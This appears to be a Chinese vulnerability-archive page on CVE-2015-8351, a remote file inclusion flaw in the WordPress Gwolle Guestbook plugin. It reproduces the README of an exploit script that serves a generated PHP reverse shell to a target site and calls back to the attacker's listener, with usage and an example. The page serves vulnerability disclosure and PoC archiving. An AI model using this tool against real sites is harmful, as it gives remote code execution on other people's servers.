关联漏洞
标题:
WordPress Gwolle Guestbook插件安全漏洞
(CVE-2015-8351)
描述:WordPress是WordPress软件基金会的一套使用PHP语言开发的博客平台,该平台支持在PHP和MySQL的服务器上架设个人博客网站。Gwolle Guestbook是其中的一个留言板插件。 WordPress Gwolle Guestbook插件1.5.3及之前版本中存在远程文件包含漏洞,该漏洞源于程序没有充分过滤用户提交的输入。远程攻击者可通过向frontend/captcha/ajaxresponse.php文件发送带有URL的‘abspath’参数利用该漏洞执行任意的PHP代码。
描述
this script is exploit for wordpress old plugin gwolle
介绍
# gwolle_buster
this script is exploit for wordpress old plugin gwolle
usage:
./gwolle_buster.py <target_url> <Lhost> <Lport>
first arguments <target_url> => your target url of wordpress that installed gwolle
second arguments <Lhost> => your ip
third arguments <Lport> => listening port for reverse shell
example: ./gwolle_buster.py http://vulnpress.com/ 192.168.1.5 1234
This Script will generate the php reverse shell script and bind the simple server,
so you need open the 2 new terminal and listen the netcat at first terminal, and request with curl commands,
however, commands are auto generate and appear at console,
therefore you can copy and paste easily
文件快照
[4.0K] /data/pocs/db45db92d0b0efdccbb308b7a34eb73bbe78c84c
├── [5.5K] gwolle_buster.py
├── [ 670] README.md
└── [2.1K] reverse_shell.php
0 directories, 3 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。